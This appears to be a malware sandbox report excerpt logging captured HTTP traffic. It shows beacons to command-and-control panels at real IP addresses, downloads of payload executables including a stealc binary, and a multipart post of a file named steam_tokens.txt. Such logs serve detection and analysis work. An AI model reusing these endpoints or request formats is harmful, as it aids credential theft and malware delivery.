4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 2d 2d 0d 0a Data Ascii: ------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="file"------GIECFIEGDBKJKFIDHIEC--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKECAFBFHJDGDHIEHJDHost: 85.28.47.31Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 2d 2d 0d 0a Data Ascii: ------AKKECAFBFHJDGDHIEHJDContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------AKKECAFBFHJDGDHIEHJDContent-Disposition: form-data; name="message"files------AKKECAFBFHJDGDHIEHJD--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHDAFIIDAKJDGDHIDAKJHost: 85.28.47.31Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 2d 2d 0d 0a Data Ascii: ------FHDAFIIDAKJDGDHIDAKJContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------FHDAFIIDAKJDGDHIDAKJContent-Disposition: form-data; name="message"wkkjqaiaxkhb------FHDAFIIDAKJDGDHIDAKJ--
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: GET /inc/PharmaciesDetection.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 32 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000025001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000002001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /inc/buildred.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /cost/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBFCGIIIJDBGCBGIDGIHost: 85.28.47.31Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 42 46 43 47 49 49 49 4a 44 42 47 43 42 47 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 31 42 42 30 41 46 41 33 31 36 44 33 33 39 32 32 35 39 37 34 39 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 43 47 49 49 49 4a 44 42 47 43 42 47 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 43 47 49 49 49 4a 44 42 47 43 42 47 49 44 47 49 2d 2d 0d 0a Data Ascii: ------GDBFCGIIIJDBGCBGIDGIContent-Disposition: form-data; name="hwid"A1BB0AFA316D3392259749------GDBFCGIIIJDBGCBGIDGIContent-Disposition: form-data; name="build"sila------GDBFCGIIIJDBGCBGIDGI--
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 32 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000027001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 33 30 30 32 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000003002&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /inc/build2.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 32 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000028001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAEBFIIECBGCBGDHCAFHost: 85.28.47.31Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 31 42 42 30 41 46 41 33 31 36 44 33 33 39 32 32 35 39 37 34 39 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 2d 2d 0d 0a Data Ascii: ------EBAEBFIIECBGCBGDHCAFContent-Disposition: form-data; name="hwid"A1BB0AFA316D3392259749------EBAEBFIIECBGCBGDHCAFContent-Disposition: form-data; name="build"sila------EBAEBFIIECBGCBGDHCAF--
